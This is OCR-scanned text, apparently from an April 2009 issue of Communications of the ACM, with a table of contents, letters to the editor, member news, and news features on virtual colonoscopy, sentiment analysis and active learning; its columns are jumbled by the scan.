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Paper Submission: The Third ACM Conference on Recommender Systems builds o 
the success of Recommenders 06 Summer School in Bilbao, Spain, RecSys’0 
in Minneapolis, USA, and RecSys’08 in Lausanne, Switzerland. Many member 
of the practitioner and research communities valued the rich exchange of idea 
ORGANIZING COMMITTEE made possible by the shared plenary sessions at these events. 
will promote the same close interaction among practitioners and researchers 
reaching a wider range of participants including those from Europe and Asie 
Published papers will go through a full peer review process. The conferenc 
proceedings are expected to be widely read and cited. In addition to a regule 
technical program, there will be tutorials covering the state-of-the-art of this do 
main, a doctoral consortium, an industrial program comprised of keynote speak 
ers and practice/industry-paper tracks, and special-topic workshops. 
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Innovative recommender applications systems 
Novel paradigms of recommender systems User modeling and recommender systems 
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| Rebooting Computing Summit 


Learning More About Active Learning 


Active learning algorithms are 
producing substantial savings 
in label complexity over passive 
learning approaches. 

By Graeme Stemp-Morlock 


Emerging Markets 

IT and the World’s “Bottom Billion” 
How can information technology 

be best applied to address 

problems and provide opportunities 
for inhabitants of the world’s 
poorest countries? 

By Richard Heeks 


| 25) 


Kode Vicious 

System Changes and Side Effects 
Comparing the potential benefits 
of system changes that help and 
the detriments of changes made 
for the sake of change. 

By George V. Neville-Neal 


14 


Our Sentiments, Exactly 

With sentiment analysis algorithms, 
companies can identify and assess 
the wide variety of opinions found 
online and create computational 
models of human opinion. 

By Alex Wright 
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Did Somebody Say 
Virtual Colonoscopy? 
Doctors are saving lives with virtual, 
3D exams that are less invasive than 
a conventional optical colonoscopy. 
By David Essex 


29 
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Technology Strategy and Management 
Strategies for Difficult (and 
Darwinian) Economic Times 

How the axiom of survival of 

the fittest applies in the context 

of a global economic downturn. 

By Michael Cusumano 


Viewpoint 

Computing as Social Science 
Changing the way computer science 
is taught in college by encouraging 
students to develop solutions to 
socially relevant problems. 

By Michael Buckley 


19 


Time to Reboot 

A diverse, international group of 
more than 200 persons met at the 
Rebooting Computing Summit to 
address the problems confronting 
computer science. 

By Bob Violino 
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VOL. 52 


IT Ecosystem in Peril 
Experts warn the U.S. may soon 
relinquish its leadership role 
in IT research and development. 
ByAlanJoch 
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Viewpoint 

Research Evaluation for 

Computer Science 

Reassessing the assessment 

criteria and techniques traditionally 
used in evaluating computer 

science research effectiveness. 

By Bertrand Meyer, Christine Choppy, 
Jorgen Staunstrup, and Jan van Leeuwen 
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36 Purpose-Built Languages 
The ecosystem of purpose-built 
languages is a key part of 
systems development. 
By Mike Shapiro 


42 Cybercrime 2.0: 


When the Cloud Turns Dark 
Web-based malware attacks are 
more insidious than ever. What can 
be done to stem the tide? 

By Niels Provos, Moheeb Abu Rajab, 
and Panayiotis Mavrommatis 


Dynamic languages provide 

a flavor of object-relational mapping 
that simplifies application code. 

By Chris Richardson 
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About the Cover: 

Mikael Christensen, a 
Danish computer scientist 
and generative artist, 
created this 3D-bridge 
using open source 
software he wrote and 
calls Structure Synth. 
When he is not generating 
art, he is creating 
bioinformatics tools as one 
of the founders of Molegro, 
developers of novel high- 
quality drug discovery and 
data mining software. For 


more information about Christensen and to experience 
more of his artwork, see http://blog.hvidtfeldts.net/. 
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Database and Information-Retrieval 
Methods for Knowledge Discovery 
Comprehensive knowledge 

bases would tap the Web’s 

deepest information sources and 
relationships to address questions 
beyond today’s keyword-based 
search engines. 

By Gerhard Weikum, Gjergji Kasneci, 
Maya Ramanath, and Fabian 
Suchanek 
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Roofline: An Insightful 

Visual Performance Model for 
Multicore Architectures 

The Roofline model offers insight 

on how to improve the performance 
of software and hardware. 

By Samuel Williams, Andrew Waterman, 
and David Patterson 


A Direct Path to Dependable Software 
Who could fault an approach that offers 
greater credibility at reduced cost? 

By Daniel Jackson 
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Technical Perspective 

Disk Array Models for Automating 
Storage Management 
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Integrating NAND Flash Devices 
onto Servers 

By David Roberts, Taeho Kgil, 
and Trevor Mudge 
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As w 


ith all magazines, page limitations often 


prevent the publication of articles that might 
otherwise be included in the print edition. 

To ensure timely publication, ACM created 
Communications’ Virtual Extension (VE). 

VE articles undergo the same rigorous review 
process as those in the print edition and are 
accepted for publication on their merit. These 
articles are now available to ACM members in 
the Digital Library. 
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Technical Opinion 
Online Auctions Hidden Metrics 
Paulo Goes, Yanbin Tu, 

and Y. Alex Tung 
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education letter 


Computing Education Matters 


occurred at a time when there is a 
strong need to recruit more partici- 
pants into the field and to engender an 
interest both in the discipline itself and 
in related innovation. For those of us 
in education, this downslide has been 


of great concern. Daunting challenges | 


such as “transforming computing edu- 
cation” and “rebooting computing” 
(see story on page 19) are high on the 
agenda. ACM’s Education Board and 
Education Council, charged with pro- 
moting computer science education in 
every possible way, have made enroll- 
ment a key focus of attention. 

For background, the Education 
Board has existed within ACM for over 
three decades. Over the years, the Board 
has initiated important education ac- 
tivities regarding computer science 
curriculum developments as well as 
provided support and encouragement 
for projects such as Eric Roberts’s not- 
ed work on the Java Task Force,* Peter 
Denning’s work on Great Principles,* 
and Lillian Cassel’s work on ontology.” 

Over the last four years, the Board’s 
activities were restructured and the 
ACM Education Council was born to 
bring together the educational and ac- 
creditation activities existing through- 
out ACM’s various committees, task 
forces, and special interest groups. 
Part of the strategy for revamping the 
Education Board and the Education 
Council was to include greater indus- 
try representation. Due to this realign- 
ment, the work of the Education Board 
itself was reshaped with considerable 
emphasis on managing the work of the 
Education Council. 

The Education Council meets about 
every eight months to keep members 
abreast of the educational concerns 
from industry, high-school teachers, as 
well as those involved in K-12 educa- 


tion. The Education Council also keeps 
track of the activities of professional 
bodies such as the National Science 
Foundation and NCWIT. Moreover, a 
vital role for the Education Council is 
to adopt an international perspective 
in identifying the concerns in comput- 
ing education and to respond by under- 


_ taking activities that will ideally have a 


positive impact. 

Some of the recent accomplish- 
ments of the Education Board and the 
Education Council include: 

> The completion of a major under- 
taking in curriculum guidance in the 


a number of European conferences un- 
der the auspices of Informatics Educa- 
tion Europe. 

Together, ACM’s Education Board 
and Education Council have estab- 


_ lished an effective pattern of activities 


form of the five volumes of CC2001: | 


namely in Computer Science (2001 
with an update in 2008); Information 
Systems (2002); Software Engineering 
(2004); Computer Engineering (2004); 
and Information Technology (2009). 
The board also finalized an Overview 


Report (2006) on this project (see ACM | 


Educational Activities’). 

>» Producing and distributing ap- 
proximately one million copies of a 
brochure promoting the many positive 
images of computing to middle- and 
high-school students.’ The brochure 
and accompanying Web site were de- 
signed, with support from the Com- 
puter Science Teachers Association 
(CSTA), to increase the visibility of 
computer science in an encouraging 
way to a young audience. 

» Supporting ACM’s Journal of Edu- 
cational Resources in Computing (JERIC) 
as it transformed into Transactions on 
Computing Education, with a first issue 
due this month. 


all the educational activities and initia- 
tives within ACM and making it widely 
available. 

> Supporting an initial computing 
education summit in China as well as 
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and accomplishments among their 
many programs and initiatives. Their 
primary activities of curricular guid- 
ance will continue and even expand. 
Working closely with CSTA and K-12 
is vital to move educational initiatives 
in the upward direction. Above all, the 
Education Board must continue to 
ensure there is an international per- 
spective and a leadership dimension 
to its activities. All of these programs 
and more will be summarized twice 
a year in inroads, the quarterly pub- 
lication from ACM’s special interest 
group on computer science education 
(SIGCSE). 

While successes have been many, 
there are still many challenges ahead 
for the education community. Projects 
and initiatives designed to reverse de- 
clining enrollment in computing disci- 
plines must proliferate and prevail if we 
are to succeed in stemming the enroll- 
ment downturn. One potential catalyst 
for the cause will be the adoption of new 
technological developments (for exam- 
ple, involving multi-core processors, 
IBM’s racetrack memory, and vastly en- 
hanced levels of interconnectivity) that 


_ are poised to transform the computing 


; : | 5. Rober 
> Creating a comprehensive chart of — 7 “°° 


community and those drawn to it. As al- 
ways, ACM will be at the forefront con- 
tinually revitalizing its Education Board 
and the Education Council and seeking 
new and inspiring ways to address the 
challenges of the day. 
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ACM, Uniting the World’s Computing Professionals, 
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Dear Colleague, 


Ata time when computing is at the center of the growing demand for technology jobs worldwide, 

ACM is continuing its work on initiatives to help computing professionals stay competitive in the 

global community. ACM's increasing involvement in initiatives aimed at ensuring the health of the com- 

puting discipline and profession serve to help ACM reach its full potential as a global and diverse society 
which continues to serve new and unique opportunities for its members. 
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Please take a moment to consider the value of an ACM membership for your career and your future in the dynamic 
computing profession. 
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Jetters to the editor 


DOI:10.1145/1498765.1498769 


What Role for Computer Science 
in the War on Terror? 


HE CONTRIBUTED ARTICLE “The 

Topology of Dark Networks” 

by Jennifer Xu and Hsin- 

chun Chen (Oct. 2008) ig- 

nored sensitive cultural is- 
sues while addressing a subject that 
might by itself offend some people 
in Muslim societies, including those 
in the Middle East. The software sys- 
tem it described for fighting what 
some might call “Islamic terrorism” 
represents a highly charged political 
subject. A more appropriate place to 
publish would have been in a pub- 
lication sponsored by, say, the U.S. 
Department of Defense, Central Intel- 
ligence Agency, or Federal Bureau of 
Investigation. ACM, which claims to 
be independent, with a clear mission 
to advance computer science while | 
being open to members from around 
the world and free of geographic, eth- 
nic, religious, or political affiliations, 
should stick to this mission and not 
involve itself in the so-called War on 
Terror. 

Science is a universal language 
that should be used to bridge gaps be- 
tween cultures, promote understand- 
ing and cooperation, and avoid wors- 
ening damage caused by politicians 
who push the world toward trouble. | 
ACM should not take on such a sen- | 
sitive subject that only increases ten- 
sions and does not make the world a | 
better place. 

This is my personal opinion. I 
would not seek to impose it on or | 
cause offense to anyone. 

Othman El Moulat, Rabat, Morocco 


Xu Responds: 
We apologize if our article appeared to 

be targeting particular groups. This was 
certainly not our intent. Our research 

tried to address the new Dark Network 
phenomenon using selected examples and 
available datasets. Our hope is to develop 
advanced, science-based, data-driven 
intelligence and security-informatics 
techniques that help analyze and 


understand illicit covert communication 
and interaction networks. We agree that 
computing research should not be used 
for political purposes. We also hope that 
our research supports the study and 
understanding of deeply complex social 
phenomena. 

Jennifer Xu, Waltham, MA 

Hsinchun Chen, Tucson, AZ 


What Gates’s Most 

Enduring Legacy Should Be 
Michael Cusumano’s Viewpoint 
column “Technology Strategy and 
Management” on “The Legacy of Bill 
Gates” (Jan. 2009) displayed a rather 
stunning values system by saying that 
“orow[ing] the PC software business... 
should be Gates’ most enduring leg- 
acy.” This is not a prediction of what 
will be Gates’s most enduring legacy, 


though on this issue I would differ as | 


well. Rather, it is a normative state- 
ment of what should be his most en- 
during legacy. Does Cusumano really 


hope that the massive changes now | 


under way in international public | 


health will not endure? His conclu- 
sion should not have been so surpris- 
ing after he referred to Gates’s philan- 
thropy as “highly laudable” but only 
in the context of bemoaning what a 


distraction it had become from his | 


business interests. I still found my jaw 
dropping at the word “should.” 
Max Hailperin, St. Peter, MN 


| NP-Completeness Not the Same 


as Separating P from NP 
In his news story “The Limits of Com- 
putability” (Nov. 2008) David Lindley 


| wrote: “Showing that a problem is 


NP-complete means proving that no 


known algorithm can solve it in poly- | 


nomial time.” 
In fact, saying that a problem is NP- 
complete means only that itis “as hard 


as” any other problem in NP. Lindley | 
apparently confused the definition of | 


NP-completeness with the problem of 
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separating P from NP. Such an error 
may be pardoned, even overlooked, 
in the science columns of a general- 
interest newspaper or magazine, but 
not in Communications. 

Madhavan Mukund, Chennai, India 


Lindley Responds: 
| Mukund is correct; this was a slip-up, 
though one that's easily rectified. 

In its earlier paragraphs, the story 
defined an NP problem as one for which 
no polynomial-time solution is known, 
then explained the distinction between NP 
and NP-complete, but in introducing the 
unresolved question of whether P and NP 
are truly distinct, I should have referred to 
NP problems generally, not NP-complete 
problems in particular. With this in mind, 
the paragraph in question would read 
correctly. 

David Lindley, Alexandria, VA 


Communications welcomes your opinion. To submit a 
Letter to the Editor, please limit your comments to 500 
words or less and send to letters@cacm.acm.org. 


Coming Next Month in 


COMMUNICATIONS 


Security in the Browser 


Spending Moore’s Dividend 


Computing Needs Time 


Debugging AJAX 


Algorithmic System Biology 


Plus the latest news on compressive 
sampling; computational advertising, 
and international education. 
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An Ongoing Study in Usability 


The new Communications Web site went live last month after several weeks of in- 
tense beta testing. While we gleaned many valuable insights and lessons in this 
process, several highlights and user comments do stand out: 
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» Testers spent an impressive 12 minutes on the beta site before it was even 
in full swing, making it nine seconds shy of Top 10 rankings tracked by Nielsen/ 
NetRatings in March 2006. 

> While Communications’ site may illustrate some user preferences for print v. 
digital, print is still strong. At press time, Google Analytics usage statistics showed 
Communications magazine archive was among the top five destinations ranked by 
page views, just ahead of the February 2009 edition. 

» The latest batch of mobile devices is putting the design model for Communi- 
cations’ site to the test. One user requested a single, narrow column layout for his 
small mobile screen; another commented on the scrolling required to view the 
site from his laptop. 

> Even when beta-testers were prompted with such typical fighting words as 
“make bug-reporting a priority,” the response was blissful. “I did not react im- 
mediately because I did not have any criticism,” said one tester. “I must say, it is 
impressive.” 
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ACM 


Member 
News 


GRANDISON WINS AWARDS 
Tyrone W. A. Grandison, 
leader of IBM Almaden 
Research Center’s 
Intelligent Information 
Systems team and an 
ACM Senior Member, was named 
Pioneer of the Year by the National 
Society of Black Engineers. He was 
also named Modern-Day Technol- 
ogy Leader by the Black Engineer 
of the Year Global Competitiveness 
STEM Board. “I think [I won the 
awards] because I am willing to 
explore new areas every 12 to 15 
months,” Grandison said in an 
email interview. “My tendency is to 
look for emerging issues, define 
the pertinent problems, and 
actively seek to solve them.” 


KIESLER RECEIVES 

SIGCHI AWARD 

Carnegie Mellon University 
professor Sara Kiesler won 
SIGCHI’s Lifetime Achievement 
Award. “Sara’s research in 

HCt has illuminated many 

of the most significant social 
impacts of computing, such as: 
‘flaming,’ social equalization, 
open communication, electronic 
groups, information sharing, 
and distributed collaboration,” 
noted SIGCHI in the award 
announcement. “She brought 
concepts from social psychology 
and HCI to robotics, helping to 
create the new interdisciplinary 
field of human-robot interaction.” 


SIGIR 09 INDUSTRY TRACK 
Aiming to bridge the gap between 
research and practice, a full-day 
Industry Track will be held at 
SIGIR ‘09, which takes place in 
Boston, MA, from July 19-23. 
“The SIGIR ’09 Industry Track 
brings together researchers and 
practitioners in the area that 
most defines our information 
age: information retrieval,” said 
Daniel Tunkelang, the Industry 
Track chair, in an email interview. 
“This assembly of the leading 
lights from industry—Google’s 
Matt Cutts, Microsoft’s danah 
boyd, and the leading enterprise 
search vendors, Autonomy, 
Endeca, and FAST— offers an 
unprecedented opportunity 

for everyone to learn about the 
science and technology of real- 
world information retrieval in a 
vendor-neutral, analyst-neutral 
setting.” 


News 


Did Somebody Say 
Virtual Colonoscopy? 


Doctors are saving lives with virtual, 3D exams that 
are less invasive than a conventional optical colonoscopy. 


OST PEOPLE OVER 50 years | suspicious growth is found, doctors 


old ignore their doc- 
tor’s advice and forgo 


“=. test that screens for 
colorectal cancer and precancerous 
growths. Fortunately, a computer- 
based, noninvasive alternative to 
the conventional optical colonos- 
copy, known as virtual colonoscopy, 


is changing people’s attitudes—and | 


could save tens of thousands of lives 
each year. 

A virtual colonoscopy starts with 
computed tomography (CT), a com- 
mon diagnostic technology that uses 


X-rays to record cross-sectional, 2D | 


images of the body’s interior. A 3D 
model is constructed by segment- 
ing the colon from the rest of the 
abdomen and using an electronic 
cleansing algorithm to factor out fe- 
cal material. Next, doctors use visual- 
ization software to navigate a virtual 
fly-through of the colon. If a polyp or 


the standard, invasive | 


can perform a virtual biopsy and in- 
vestigate further. 

The case for a convenient mass- 
screening method is strong, says Arie 


Kaufman, chair of the computer sci- | 


ence department at New York’s Stony 
Brook University. Colorectal cancer is 
the third most common cancer and 
the second leading cause of cancer 
deaths in the U.S., with more than 
140,000 new cases and more than 
50,000 deaths a year. “If all patients 
50 years of age and older will partici- 
pate in these screening programs, 
over 92% of colorectal cancer will 
be prevented and over 600,000 lives 
could be saved worldwide every year,” 
Kaufman says. 

Virtual colonoscopies became pos- 
sible in the mid-1990s, when Kaufman 
and others developed volume-render- 
ing techniques that enabled 3D, virtu- 
al fly-throughs and associated tools, 
which were soon commercialized. 


A screenshot of a user interface for virtual colonoscopy and computer-aided detection. 
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Virtual colonoscopies have recent- 
ly earned the imprimatur of the medi- 
cal establishment, which prefers the 
formal term CT colonography. In a 
study at U.S. military hospitals, 1,233 
symptomless subjects underwent a 
virtual colonoscopy, followed by a 
conventional optical colonoscopy, on 
the same day. The virtual colonoscopy 
results, reported in the New England 


| Journal of Medicine in 2003, showed 


94% sensitivity (real polyps found) 
and 96% specificity (false-positive 
rate) for polyps 8mm and larger— 
numbers comparable to those of op- 
tical colonoscopy, the gold standard 
among doctors. Subsequently, the 
U.S. Food and Drug Administration 
approved virtual colonoscopy for co- 
lon cancer screening. 

Virtual colonoscopy outperforms 
optical colonoscopy in certain ways, 
advocates claim. A University of Wis- 
consin study, for example, found it 
better at finding 8mm and 10mm 
polyps. It also outperforms optical 


| | colonoscopy in finding polyps hid- 
| den in folds and around corners of 


the twisting tube of the colon, and in 
reliably reaching the farthest reach- 
es, called the caecum. It can also do 
something optical colonoscopy, by its 
nature, cannot do: spot polyps on the 
colon’s outer walls. 

Also, because it is noninvasive, a 
virtual colonoscopy avoids the risk of 
the rare but deadly tears or holes that 
can occur during an optical colonos- 
copy (and which can require imme- 
diate surgery). “The examination is 
done on the data, rather than the 
patient,” says Dr. C. Daniel Johnson, 
a principal investigator at the Mayo 
Clinic in Scottsdale, AZ, and the lead 
researcher on several studies. 

Virtual colonoscopy’s only sig- 


_ nificant health risk is a patient’s ex- 


| posure to radiation. This trade-off 


KAUFMAN 


RIE E 


OF 


SCREENSHOT COURTESY 


the number of adjectives in a sentence.) 
Using these and other criteria, senti- 
ment analysis algorithms can then be- 
gin to create computational models of 
human opinion. 

Complicating matters even further 
are questions of context (who’s speak- 
ing, and to whom?) and linguistic nu- 
ances like slang and ambiguity. A “bad 
motorcycle” might actually be a good 
one; whereas a “bad movie” is probably 
just plain bad. Sentiment analysis algo- 
rithms sometimes have to go beyond 
literal interpretations of a text to dis- 
cern an author’s original intent. Given 
the wide varieties of idiomatic writing 
on the Web, this is no small task. As 
Grimes notes, “You don’t see ‘Genistein 
inhibits protein histidine kinase...Notl’ 
in a scientific paper.” 


Mining Collective Opinions 

“With opinions, so much depends on 
the point of view of the user,” says Da- 
vid Pierce, chief technology officer of 
Jodange, whose sentiment analysis 
software grew out of a research project 
by Claire Cardie at Cornell University 
and Jan Wiebe at the University of Pitts- 
burgh. Drawing on a body of theory in 
linguistics, philosophy, and computa- 
tional linguistics, their team developed 
an algorithm that tries to determine the 
context of any particular statement by 
isolating three key data points: the top- 
ic, the opinion holder, and the opinion 
itself. First, the algorithm employs an 
entity extraction routine that locates key- 
words to identify particular topics and 
opinion holders. Next, it layers that data 
onto a linguistic analysis of the opinion 
being expressed. The resulting unit of 
data is a triple consisting of opinion, 
opinion holder, and topic. These triples 
are then stored in a relational database, 
where they can be cross-referenced 
across multiple documents to create 
what Jodange vice president of product 
management and marketing Pia Chong 
calls a “walled garden of opinion.” 

By connecting opinions from mul- 
tiple sources about a particular topic, 
the application can provide users with a 
bird’s-eye view of a particular topic pre- 
sented in a variety of different formats: 
straightforward lists, heat maps that 
show the concentration of opinions on 
particular topics, an opinion index that 
calculates positive or negative trends, 
ora so-called Doppler view that shows a 


graphical summary of opinion data. The 


predictive model that could use opinion 
data to predict future developments, 
such as the impact of written opinion on 
trends in a company’s stock price. 

A number of other companies are 


nies like Attensity, Clarabridge, Lexalyt- 


oping their own proprietary versions 


these products employ some combina- 
tion of keyword extraction and linguis- 


lective opinion. Some of these products 
are targeted toward business applica- 
tions, others toward consumer-facing 
_ Web applications. 

For consumers, the most obvious 
applications for sentiment analysis in- 
volve enhancing search engines with 


software could enable a much smoother 
user experience” for consumer research, 
says Pang. Microsoft’s Product Search, 
which is part of Live Search, and Yelp’s 
review highlights, which include phras- 


reviews, already rely on basic sentiment 
analysis to enhance their search results. 
Such interactions could eventually find 
their way into the general Web search 


interactions could be fine-tuned for us- 
ers at different stages of the research 


from reviews of a product category to 

comparisons between products, then 

finally to in-depth product reviews. 
Beyond the realm of consumer prod- 


For many businesses, 

online customer 

opinions have 

become a type of 

virtual currency that 

_ can make or break 
their products. 


APRIL 2009 


now developing their own variations of 
sentiment analysis software. Compa- | 


of sentiment analysis software. All of 


more opinion data. “Sentiment analysis | 


es automatically extracted from user | 


experience. Pang suggests that such | 


company is currently working on a new | 


ics Limited, SPSS, and TEMIS are devel- | 


tic analysis to provide their customers | 
with a particular understanding of col- | 


process, allowing them to narrow down 
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News 


| ucts, Pang also sees opportunities for 


sentiment analysis to shape the way peo- 
ple consume news. “When the media is 
having a field day, [users] might want to 
get a digest of different perspectives on 
the breaking news with analysis.” Simi- 
lar applications might eventually lead 
to new types of interfaces where readers 
could track the movement of opinion 
about particular stories over time. 

That kind of opinion-trending in- 
sight is particularly valuable to users 
working in business or government. 
These potential users might include 
business intelligence professionals, 
market researchers, or public relations 
specialists. Today, sentiment analysis 
vendors are already marketing their 
products to companies in the form of 
hosted services that provide opinion 
dashboards and other management 
tools. At this stage, sentiment analysis 
software is too new to have penetrated 
most IT firewalls. Eventually, however, 
companies may start exploring how to 
integrate sentiment analysis data with 
their core management systems. “Uni- 
fied analysis is coming,” says Grimes, 
“but it’s not here yet.” 

Attensity is taking a step in that di- 
rection by marketing a suite of tools de- 
signed to help companies integrate sen- 
timent analysis data with their internal 
business operations. In addition to pro- 
viding sentiment analysis data, Atten- 
sity provides mechanisms for funnel- 
ing that data into operational “queues” 
like marketing campaigns or call center 
scripts. “For example, if a valuable cus- 
tomer is upset they can route them toa 
special marketing campaign that com- 
pensates them through points or other 
things of value,” explains Michelle de 
Haaff, Attensity’s vice president of mar- 
keting and products. 

As sentiment analysis finds its way 
into the business mainstream, vendors 
will likely continue to develop similar 
services that bring sentiment analysis 
into the IT mainstream. Once that in- 
tegration starts to happen, companies 
will be able to feed opinion data into 
core business processes that can help 
them strengthen their customer rela- 
tionships—and, ultimately, boost prof- 
its: a decidedly unsentimental goal. 


Alex Wright is a writer and information architect who lives 
and works in New York City. 
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Our Sentiments, Exactly 


With sentiment analysis algorithms, companies can identify and assess the wide variety 
of opinions found online and create computational models of human opinion. 


ACTS MAY BE Stubborn things, as 

John Adams once put it, but at 

least they’re easy to compute. 

From a data-processing per- 

spective, opinions are much 
more stubborn. 

In recent years, the Web has created 
a bull market in human opinion: movie 
reviews, product ratings, restaurant rec- 
ommendations, and all kinds of other 
viewpoints expressed in articles, blogs, 
discussion groups, and elsewhere. As 
the Web accumulates more and more 
data, many of us rely on each other’s 
opinions as a filter to help us make in- 
formed decisions. For many business- 
es, customer opinions have become a 
type of virtual currency that can make 
or break their products. As opinion data 
plays an increasingly important role on 
the Web, however, computer scientists 
are discovering the limitations of tradi- 
tional text analytics algorithms for sort- 
ing opinions from raw facts. 

The distinction between facts and 
opinions might seem clear enough 
on the surface, but in practice teas- 
ing them apart involves parsing many 
linguistic shades of gray. This is where 
the emerging field known as sentiment 
analysis comes in. Sometimes called 
opinion mining or subjectivity analysis, 
sentiment analysis is a new term that 
broadly refers to the identification and 
assessment of opinions, which for the 
purposes of computation might be de- 
fined as written expressions of subjec- 
tive mental states. 

Traditional text analytics algorithms 
work by scanning a body of text to ex- 
tract and analyze keywords. That ap- 
proach works well for identifying sim- 
ple factual statements, but assessing 
opinions requires delving much deeper 
into the subtleties of human language. 
“Sentiments are very different from 
conventional facts,” says analytics con- 
sultant Seth Grimes. While direct ex- 
pressions of opinion are fairly easy to 
spot—for example, “I hated Revenge of 
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An example of sentiment analysis from Michael Gamon in which topics from reviews of the 
Volkswagon Golf are depicted. The size of each topic box indicates the number of mentions 
of the topic, and the shading of each topic box indicates the average sentiment, ranging from 


the Sith”—most human sentiments fall 
somewhere alonga continuum from ob- 
jective fact to subjective experience. For 
example, “It’s fifteen degrees outside” 
is an objective statement; “It’s cold” re- 
veals a somewhat more subjective point 
of view; while “I’m putting on two pairs 
of socks” constitutes a completely indi- 
rect expression of opinion disguised as 
a statement of fact. 

“We are dealing with sentiment that 
can be expressed in subtle ways,” says 
| Yahoo! researcher Bo Pang, co-author 
of the book Opinion Mining and Senti- 


ment Analysis. To penetrate those sub- 
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negative (red) to neutral/none (white) to positive (green). 


tleties, sentiment analysis algorithms 
assess written statements through a se- 
ries of overlapping filters. They usually 
begin by attempting to determine the 
polarity of a particular sentiment—i.e., 
Is it positive or negative? Once that’s 
established, they may try to determine 
the intensity of sentiment being ex- 
pressed—i.e., How positive or negative 
is this statement? Next, an even more 
subtle layer of analysis might attempt 
to determine the degree of subjectivi- 
ty—i.e., How partial or impartial is the 
point of view being expressed here? 
(This is often determined by looking at 
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dom, and future data distributions 
might differ sharply from the labeled 
examples selected by the algorithm. 

To correct the sampling bias, or 
generalization error, Daniel Hsu, a 
Ph.D. student at University of Califor- 
nia, San Diego, and Dasgupta recom- 
mended a scheme where each chosen 
example has an importance weighting 
determined byits selection probability. 
More likely points have higher weight- 
ings, and less likely points have lower 
weightings. As a result, the algorithm 
could realize when it had selected an 
unlikely point that was very informa- 
tive and correct its expectations for 
any future data. 


Putting Theory Into Practice 

With several solid years of theoretical 
work behind them, the active learning 
researchers are beginning to tackle an 
even larger challenge than developing 
the theoretical underpinnings of ac- 
tive learning. Now, they are trying to 
link theoretical algorithms with large- 
scale applications. 

“There’s a striking difference be- 
tween what’s known in practice and 
theory with active learning,” says Hsu. 
“The theory is trying to catch up with 


what is known about what works well | 
in practice, and to be able to say some- | 


thing mathematical about what works 
and what doesn’t.” 

The University of Pennsylvania’s 
Wortman agrees. “[Active learning] is 
used quite frequently in practice with 
impressive results, and it’s a subject of 
increasing interest in the theory com- 


munity, but there’s still a huge gap | 


between theory and practice. At a fun- 
damental level, we don’t really know 
‘why’ the particular active learning 
algorithms that are used in practice 
work.” 

Toward that goal, some theorists 
are looking to find general methods of 
building algorithms that can be used 
in any situation. General purpose-built 


algorithms have existed for decades in | 


passive learning. However, with active 
learning, an algorithm must almost be 
built from scratch for each new appli- 
cation. 

At Carnegie Mellon, Hanneke is 


working on a type of “meta-algorithm” | 


that can take established passive 
learning algorithms and churn out an 
active learning algorithm with passive 


| learning algorithms as subroutines. 
| His hope is that this new work, which 
| he calls “activized learning,” will have 
the benefit of using established pas- 
sive learning, alongside active learning 
with its guaranteed improvements, on 
the number of labels needed. 

Maria-Florina Balcan, a post-doc- 
toral student with Microsoft Research 
New England, believes that active 
learning algorithms are too delicate 
for such a general method to exist. In- 
stead, Balcan is broadening the type 
of interaction that active learning can 
handle beyond just labeling unlabeled 
examples. She points out that in other 
situations another interaction method 
might be more natural. 

Take the example of trying to clas- 
sify images of people by gender, says 
Balcan. If the interaction is changed, 
the teacher might be able complain 
to the learner that some classifiers are 
too general and need to be split, or 
that some are too similar and need to 
be merged. The teacher might suggest 
a new class to be added, or notice that 
the learning is making certain mis- 
takes and suggest a new zone that will 
eliminate those classification errors. 

“Much of the theoretical and prac- 
tical work on active learning was de- 
veloped on a very specific model and 
function of interaction,” says Balcan. 
“But the interaction could be differ- 
ent. The main direction that I see for 
improvement in the future is extend- 
ing the type of interaction between the 
learning algorithm and the user.” 

Given the progress made in the 
past several years, with more horizons 
opening up, the future of active learn- 
ing appears to be very promising. “We 
now have active learning algorithms 
providing substantial guarantees on 
performance while relying on rela- 
tively minimal assumptions about the 
world,” notes John Langford, doctor of 
learning at Yahoo! Research. “We have 
| a reasonable understanding of where 
_ and when they provide performance 
improvements over passive learning. 
These algorithms are also practical, 
often yielding substantial savings in 
label complexity over passive learning 
| approaches.” 


| Graeme Stemp-Morlock is a science writer based in 
| Waterloo, Ontario, Canada 
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News 


Research & Development 


U.K. 


Funding 


Fosters 


Innovation 


The computational thinking 

that drives the field of computer 
science is a key tool for solving 
problems, designing systems, and 
understanding human behavior 
in many disciplines, according 
toa panel of international 
experts in Computer Science 

and Informatics (CS&1). The 
findings of the project, the 
Research Assessment Exercise 
2008, confirmed the U.K. as a top- 
ranked research power among 
industrialized countries. 

The survey reported an 
increased level in the influence 
of computer science on 
other disciplines, including 
bioinformatics, medicine, and 
e-health. It also found that more 


| computer science research 


used mathematics to quantify 
the complexity and rigor of 
calculations. The analysis also 
found that research funding for 
CS& for the period 2001 to 2008 
more than doubled, from $376 
million in 2001 to $763 million, 


| leading participants to conclude 


that continued commitment to 
funding research and innovation 
is necessary to maintain global 
excellence in a battered economy. 
The review of research in 
CS&1 surveyed 81 colleges and 
universities and found the 
subject not only healthy and 
growing, but more rigorous, 
interdisciplinary, experimental, 
and user-oriented than ever. 
“The vitality of the 
computing field, which is due 
in large measure to increased 
investment in research, is 
directly related to the degree of 
innovation that emerges from 
U.K. research institutions,” says 
ACM President Dame Wendy 
Hall, who participated in the 
survey’s computer science panel. 
“These innovations, in turn, 
foster research partnerships 
with startup companies as well 
as spinouts and collaborations 
with subject matter experts and 
multinational corporations. 
The resulting level of economic 
activity crosses into all indus- 
tries, even creating new sectors 
that provide career opportunities 
in the computing and infor- 
mation technology field.” 
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will be needed to tell the difference be- | challenge. Little progress had been 


tween, for instance, aspam email mes- | 


sage offering you a free cruise and an 
email message from your parents tell- 
ing you about their Alaskan cruise. 
“By allowing the algorithm to inter- 
actively choose the ‘most informative’ 


samples to be labeled, the algorithm | 


will be able to produce a much more 
accurate model using fewer labeled 
samples, meaning that we have to do 
a lot less tedious labeling by hand to 
get accurate prediction models,” says 
Jenn Wortman, a Ph.D. student at the 
University of Pennsylvania. “It is pos- 


sible to prove that in some special | 


cases, active learning algorithms can 
produce models with the same accura- 
cy as models built by passive learning 
algorithms while requiring exponen- 
tially fewer labeled examples.” 


Information Overload 
Of course, deciding what makes an 
example informative or not is a huge 


Career 


made until 2005 when Sanjoy Das- 
gupta, a professor of computer sci- 
ence at the University of California, 
San Diego, published a paper, “Coarse 
Sample Complexity Bounds for Ac- 
tive Learning,” which quantified how 
many labeled examples are needed to 
find a pattern with active learning over 
passive learning. The result was sig- 
nificantly less with active learning, but 
some basic assumptions were needed 
to see such dramatic outcomes. 

One of the most problematic as- 
sumptions was that there could be no 
mislabeled examples causing noise, 
which would be unreasonable in real- 
world applications. The following 
